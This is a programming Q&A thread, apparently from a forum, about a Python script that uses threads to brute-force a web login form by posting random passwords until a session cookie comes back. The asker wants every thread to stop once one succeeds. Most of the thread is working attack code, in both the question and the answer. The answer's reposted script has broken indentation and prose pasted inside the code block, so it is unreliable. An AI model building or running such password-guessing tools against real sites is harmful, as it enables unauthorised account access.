# Is there a way to stop multiple threads after the first thread finishes it's job?

Tags: python, multithreading

I've been trying to speed up the number of password attempts being posted to a test website using threading.

```
import string
import random
import requests
import threading

threads=[]
threadLength=10

def typeCheck():

  passType = input("\nWhat Type Of Password Is Used? Type 'help' For More Help\nL=Letters, D=Digits, S=Symbols: ")

  if passType == "L":
    pt = string.ascii_letters
  elif passType == "D":
    pt = string.digits
  elif passType == "S":
    pt = string.punctuation
  elif passType == "LD":
    pt = string.ascii_letters + string.digits
  elif passType == "DS":
    pt = string.digits + string.punctuation
  elif passType == "LS":
    pt = string.ascii_letters + string.punctuation
  elif passType == "LDS":
    pt = string.ascii_letters + string.digits + string.punctuation
  elif passType == "help":
    help()
    exit()
  else:
    exit("Invalid Type, Try Again.")
  return pt

def lengCheck():

  passLeng = int(input("\nWhat Is The Password Length?\nAny Positive Integer: "))

  if passLeng > 0:
    pl = passLeng
  else:
    exit("Invalid Password Length.")
  return pl

def createThreads(passType, passLength, url, username, userData, passData):
  for i in range(threadLength):
    global t
    t = threading.Thread(target=breaker, args=[passType, passLength, url, username, userData, passData, threads])
    threads.append(t)
  return threads


def breaker(passType, passLength, url, username, userData, passData, threads):

  remAttempts=[]
  sesh=requests.session()
  attempts=0
  print()

  while True:
      
    attempt = 'tes'+''.join(random.choice(passType)for i in range(passLength))
    if attempt in remAttempts:
      pass
    else:
      remAttempts.append(attempt)
      request = sesh.post(url, data={
        ''.join(userData):username,
        ''.join(passData):attempt
      })
      print('<-------'+attempt+'------->')
      logAuth=request.cookies
      if logAuth:
        break
      else:
        pass
        
    attempts += 1
  print("\nThe Password is "+str(attempt)+" and it took "+str(attempts)+" attempts")
  # I had code here to exit the script, but realized it only affected one thread

def getForm():
    
  username = input("Username: ")
  url = input("Url: ")
  userData = input("Username form data: ")
  passData = input("Password form data: ")
  return [url, username, userData, passData]


def bruteForce(threads):

  for i in range(threadLength):
    threads[i].start()
  for i in range(threadLength):
    threads[i].join()
```

Here is the main.py file that actually gets run

```
import pBreak

formData =  pBreak.getForm()

passType = pBreak.typeCheck()
passLeng = pBreak.lengCheck()

threads = pBreak.createThreads(passType, passLeng, formData[0], formData[1], formData[2], formData[3],)

details = pBreak.bruteForce(threads)
```

When I run the code at this point, it will run all ten threads one after another, each one at 10x speed. I want to end the entire thing after one thread going at 10x speed, instead of running the `breaker(...)` method ten times. Also, it doesn't have to be with threading, I just want what I described to happen, so any type of solution works.

Answer (score 0):

```
import string
import random
import requests
import threading

threads=[]
threadLength=10
end_breaker = False

def typeCheck():

  passType = input("\nWhat Type Of Password Is Used? Type 'help' For More Help\nL=Letters, D=Digits, S=Symbols: ")

  if passType == "L":
    pt = string.ascii_letters
  elif passType == "D":
    pt = string.digits
  elif passType == "S":
    pt = string.punctuation
  elif passType == "LD":
    pt = string.ascii_letters + string.digits
  elif passType == "DS":
    pt = string.digits + string.punctuation
  elif passType == "LS":
    pt = string.ascii_letters + string.punctuation
  elif passType == "LDS":
    pt = string.ascii_letters + string.digits + string.punctuation
  elif passType == "help":
    help()
    exit()
  else:
    exit("Invalid Type, Try Again.")
  return pt

def lengCheck():

  passLeng = int(input("\nWhat Is The Password Length?\nAny Positive Integer: "))

  if passLeng > 0:
    pl = passLeng
  else:
    exit("Invalid Password Length.")
  return pl

def createThreads(passType, passLength, url, username, userData, passData):
  for i in range(threadLength):
    global t
    t = threading.Thread(target=breaker, args=[passType, passLength, url, username, userData, passData, threads])
    threads.append(t)
  return threads


def breaker(passType, passLength, url, username, userData, passData, threads):
  global end_breaker
  if not end_breaker:
    remAttempts=[]
    sesh=requests.session()
    attempts=0
    print()

    while True:
        
        attempt = 'tes'+''.join(random.choice(passType)for i in range(passLength))
        if attempt in remAttempts:
        pass
        else:
        remAttempts.append(attempt)
        request = sesh.post(url, data={
            ''.join(userData):username,
            ''.join(passData):attempt
        })
        print('<-------'+attempt+'------->')
        logAuth=request.cookies
        if logAuth:
            break
        else:
            pass
            
        attempts += 1
    print("\nThe Password is "+str(attempt)+" and it took "+str(attempts)+" attempts")
    end_breaker = True
  # I had code here to exit the script, but realized it only affected one thread

def getForm():
    
  username = input("Username: ")
  url = input("Url: ")
  userData = input("Username form data: ")
  passData = input("Password form data: ")
  return [url, username, userData, passData]


def bruteForce(threads):

  for i in range(threadLength):
    threads[i].start()
  for i in range(threadLength):
    threads[i].join()
Here is the main.py file that actually gets run

import pBreak

formData =  pBreak.getForm()

passType = pBreak.typeCheck()
passLeng = pBreak.lengCheck()

threads = pBreak.createThreads(passType, passLeng, formData[0], formData[1], formData[2], formData[3],)

details = pBreak.bruteForce(threads)
```

I think creating a global variable to end the task is a quick fix for your problem.